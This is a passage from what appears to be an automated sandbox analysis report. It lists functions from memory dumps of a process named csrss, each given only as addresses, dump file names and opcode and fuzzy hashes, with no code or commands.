                                                      • Instruction Fuzzy Hash: C3017132F089098FEB54EA58D4803FC77A2FBA83A1F094171D01DE7195DF79A8868754
                                                      Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Function 00007FF848E944B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction ID: a91b8619bec2bf361a0c115887e1dd36093ec5f47597101b0e4213bdb8518002
                                                      • Opcode Fuzzy Hash: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction Fuzzy Hash: A7F0FC31D0C5864FE766B66484142BA37D1BF96358F0902BBC44EC71D3DE7C99468355
                                                      Function 00007FF848E9833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50ea1c31d708645bc9edc685278084fcff4d137b6002ed32c8d2ab33c1dc3988
                                                      • Instruction ID: 162b762cbb97feb5fc6e94ab1ab95c5c7ce3af4e6a9b7d0e6f3297f334f02dbd
                                                      • Opcode Fuzzy Hash: 50ea1c31d708645bc9edc685278084fcff4d137b6002ed32c8d2ab33c1dc3988
                                                      • Instruction Fuzzy Hash: 94018B21E0C85A8FFA94FA548455AA83291FF55340F1442F6D80DD32D2DF38BD428B84
                                                      Function 00007FF848E80C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Function 00007FF848E84F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9972a11d5bc5eabba6ecd45fd49e9ceace7690c6507b1bdb0097d2214021b141
                                                      • Instruction ID: e1256bd42853e4a8fa8f65879b2a482054854013c94147e1a8857e1fd26f8f41
                                                      • Opcode Fuzzy Hash: 9972a11d5bc5eabba6ecd45fd49e9ceace7690c6507b1bdb0097d2214021b141
                                                      • Instruction Fuzzy Hash: DF018F31E0D9668FEB61FB28845467C7790FF55350FA401F6C44ED3282DF3929419785
                                                      Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction ID: ae587d8c9fa2b10dad1bb3720a8f5794a80afbf83b356ebd189300f2151b1652
                                                      • Opcode Fuzzy Hash: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction Fuzzy Hash: E8014B7090D7899FE712EB64848429DBFB0FF02354F5441E6D440DB292DA385A48C755
                                                      Function 00007FF848EBAD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction ID: fcca27f9d320b925f20e9cc32536dff977c6df31ca41e3e05c7aa82794f097c9
                                                      • Opcode Fuzzy Hash: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction Fuzzy Hash: BBF0EC31B0CBC44FC729953D58590717FE1DB6B50234902FFC086C76A3DD55AC868341
                                                      Function 00007FF848E93FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57294f83e1b68b98fce4e8fe6d31f63e0197f81d9f405fd9faedd03b706b940a
                                                      • Instruction ID: bb76e24016938fea691167359fc1b68671a02e73431e94c8fb79aab3a0b76988
                                                      • Opcode Fuzzy Hash: 57294f83e1b68b98fce4e8fe6d31f63e0197f81d9f405fd9faedd03b706b940a
                                                      • Instruction Fuzzy Hash: 34F03770E0890B8FEB98EA88C9656FE77B0FB55355F00063AC016C2294DFB86A458A84
                                                      Function 00007FF848E82B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 897828f0cad2904c0c3f1e321a18de19ee6196dcc1b12444fcd6fbfab5531f45
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: 72F0313094C85E8EEBB4FA14C8446EC73A2FF90391F9441F5C00DD31A2DF7869818B48
                                                      Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction ID: 3d9fe52116f3cd3b994742c43faaa95fa8d6b8a69e088d83ccc2dfed2720d27b
                                                      • Opcode Fuzzy Hash: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction Fuzzy Hash: 31F0E53525EA89DFD742AB3CC8A58D8BF60FF03204F5A02EAD089CB563C315585DCB41
                                                      Function 00007FF848EBB0DA Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f090d4a159bce1ad1f76800c3737569c460dd51b37d11f8a3ed097902b455a9
                                                      • Instruction ID: 60f112332714289aa42866f142fd84c1c7d1cb363701cb6485c094066bde4aad
                                                      • Opcode Fuzzy Hash: 2f090d4a159bce1ad1f76800c3737569c460dd51b37d11f8a3ed097902b455a9
                                                      • Instruction Fuzzy Hash: 44F08220F1D94A8FE289FB1944993B972D1FFA8741F5401B5C40DD32C3DF3868819345
                                                      Function 00007FF848E947C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 72dfe41cc1271e0580601fd6b3606b566de14bbf7e733d6eeb018244facd3da0
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 91F03A30D0C5064FEA58BA9894406B932D1FF45398F5145B5D85A83297DF78A8528688
                                                      Function 00007FF848E99302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: 0f8b5b57bd63dcfd1c2f07b7a64f6f6c55e27444d5c6690cd51d635ba2b73a24
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: FDE03932A1C9098FEBA4FB68D4457EC73E1FF49350F5000B6D00EC7292CB34A8118B44
                                                      Function 00007FF848EB3459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction ID: a739e06f0e8502fe483e838922758398eaa7352804999297bed0dab5d7847b66
                                                      • Opcode Fuzzy Hash: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction Fuzzy Hash: D5E09220609BC84FC70EA63848685607FB1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848EB21E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction ID: ba72e72833af96ee131c3f19372bec77b25fe385a5b738d822424ac03b9dd320
                                                      • Opcode Fuzzy Hash: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction Fuzzy Hash: 79E0D830B197C44FC70DA63C8869524BBB1EF67102B8952FEC445CB1A3DA19DC85C741
                                                      Function 00007FF848EBD969 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction ID: f3d4e085bc6c5acc53db3d3df450aa129fcea85a893356c57538809b3b7e23c5
                                                      • Opcode Fuzzy Hash: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction Fuzzy Hash: 02E04F7294F7C08FC70B9B7488B98503F60EF2721174A41EAC045CF1B3DA6A8849C711
                                                      Function 00007FF848EBD8E9 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction ID: 85572a5e45cd1c369aa1d6bf560f13143b757b9d6cd218781dd89967dc619601
                                                      • Opcode Fuzzy Hash: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction Fuzzy Hash: 24E01A3294E7C08FC70B9B7488B98503F60EF2761174A41EAC085CF1B3D66A8849C712
                                                      Function 00007FF848EB7C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction ID: 7ff830a7443cad6512879e5d8c0f948295f3bacf7d98cd8823ab38c64c157b8f
                                                      • Opcode Fuzzy Hash: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction Fuzzy Hash: 08E01A34A8A7804FC70AAB3888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848EB80D9 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction ID: b752384c769f0f410027a9006e33708fca3bd32db75b6e4923dfe2a1ffce5200
                                                      • Opcode Fuzzy Hash: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction Fuzzy Hash: BBE04F3165AB804FC70AA728886D9547BF1EF6B211B4A40EBC045CB5B3D61DDC49C702
                                                      Function 00007FF848E95178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: 32e6ea605917876ef5762ba9247008bf6a6c45deb24af416aa9ffb141f28c6a4
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: 5DD0A730B60A0D4B8B0CB63D8458430F3D5F7AA6167D452BDD40BC3281ED25ECC6CB84
                                                      Function 00007FF848E956D8 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction ID: 25bcc22724a5fb7d8c689320c1e06a891c540dc00e4d48c87d4623df9079018b
                                                      • Opcode Fuzzy Hash: 33048c691754e2148c641c71409f8f72af6773d4cb460236c5ad15c8e747d6fc
                                                      • Instruction Fuzzy Hash: 01D0A730B60A0D4B8B0CB63D8458530F3D1F7AA6167D4527CD40BC3281ED25ECC6CB84
                                                      Function 00007FF848E93A10 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Function 00007FF848EBA900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848EBA870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E83824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: b1aa58225af30ef3009926a3ad24ed8b1d7ed8fd6556f6ede8ea2fe6e7ca0ed1
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: 5BE01A20E0C51A4FFB54F614C8517BD63A1FF98380FA000B8D92E936D2CF386D809A59
                                                      Function 00007FF848EB2290 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF848EB71D0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 627c17e139fed78debd96b5f264f4ccc04e0e0a128c9c2da64bcc411b2ed45b6
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 73D01234B549044FC70CB6388C99C747391EB6E216B9540ADD00AD77B1DA6ADC89CB41
                                                      Function 00007FF848EBBB50 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: a1b89c7fc47824ca41353d7ed97788391dad4335844ea0bde91eb149b60312ea
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BAD01234B549094FC70CF638985987473A1EB6A216B9540B9D00AC72B1DA6ADC89C741
                                                      Function 00007FF848E81953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74d874bb2e110abedec970dab5ea37f35f3e185b7963e63ab2b3a8ceea8f334c
                                                      • Instruction ID: b6d197cad28bac385bcea4d28c06bd40c69c9ec76a81e1cb33e5ddd8efa96088
                                                      • Opcode Fuzzy Hash: 74d874bb2e110abedec970dab5ea37f35f3e185b7963e63ab2b3a8ceea8f334c
                                                      • Instruction Fuzzy Hash: 18D05E31E1DA494EEB41B3B0841A2FD5292BF10340F880478D45E971C3CF3E34006A94
                                                      Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: c31856955ed2e3c74bff67d5eed7038733c80ad951e00bd8430a1a3eff3b721d
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 86C08C00D0F90B08E440316F14020ACA2007FC47A4FE10032C01C42092EE3D20C5116E
                                                      Function 00007FF848E8559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
